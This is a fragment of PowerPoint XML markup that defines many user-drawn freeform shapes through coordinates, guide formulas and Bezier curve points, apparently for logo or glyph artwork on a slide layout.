                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="2"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Freeform 302"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="789"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 2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2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="2"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Freeform 303"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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Freeform 304"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="1468"/>
                <a:ext cx="82"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Freeform 306"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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307"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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309"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="1468"/>
                <a:ext cx="83"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311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 312"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="134"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="46"/>
                      <a:pt x="11" y="35"/>
                      <a:pt x="17" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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313"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="147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Freeform 314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 241"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="27"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                      <a:pt x="41" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="104"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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315"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="1473"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 241"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 241"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 241"/>
                  <a:gd name="T30" fmla="*/ 42 w 63"/>
                  <a:gd name="T31" fmla="*/ 83 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 112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Freeform 316"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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317"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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Freeform 318"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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319"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982"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Freeform 320"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="1468"/>
                <a:ext cx="82"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321"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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Freeform 322"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477"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3"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Freeform 323"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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Freeform 324"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="1468"/>
                <a:ext cx="83" cy="244"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 200 h 200"/>
                  <a:gd name="T2" fmla="*/ 45 w 68"/>
                  <a:gd name="T3" fmla="*/ 200 h 200"/>
                  <a:gd name="T4" fmla="*/ 45 w 68"/>
                  <a:gd name="T5" fmla="*/ 31 h 200"/>
                  <a:gd name="T6" fmla="*/ 38 w 68"/>
                  <a:gd name="T7" fmla="*/ 36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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31"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325"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 326"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 327"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="636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Freeform 328"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="655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Freeform 329"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="675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Freeform 330"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897"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2 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 155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2" y="27"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>
                      <a:pt x="42" y="85"/>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Freeform 331"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="1473"/>
                <a:ext cx="78"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6 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 155 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 120 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 44 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 17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Freeform 332"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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333"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311"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7" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27"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5"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Freeform 334"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509"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Freeform 335"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657"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Freeform 336"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="1460"/>
                <a:ext cx="218"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60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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 187 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160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9 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 45 h 209"/>
                  <a:gd name="T88" fmla="*/ 65 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 49 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59 h 209"/>
                  <a:gd name="T98" fmla="*/ 86 w 179"/>
                  <a:gd name="T99" fmla="*/ 68 h 209"/>
                  <a:gd name="T100" fmla="*/ 71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6"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="194"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="209"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="199"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="80" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="71" y="200"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="197"/>
                      <a:pt x="4" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="192"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="169"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="8" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="186"/>
                      <a:pt x="62" y="183"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="34" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="26" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="146"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="34" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="51" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="58" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="96" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="98"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="159" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="157"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="158"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="153"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="150"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
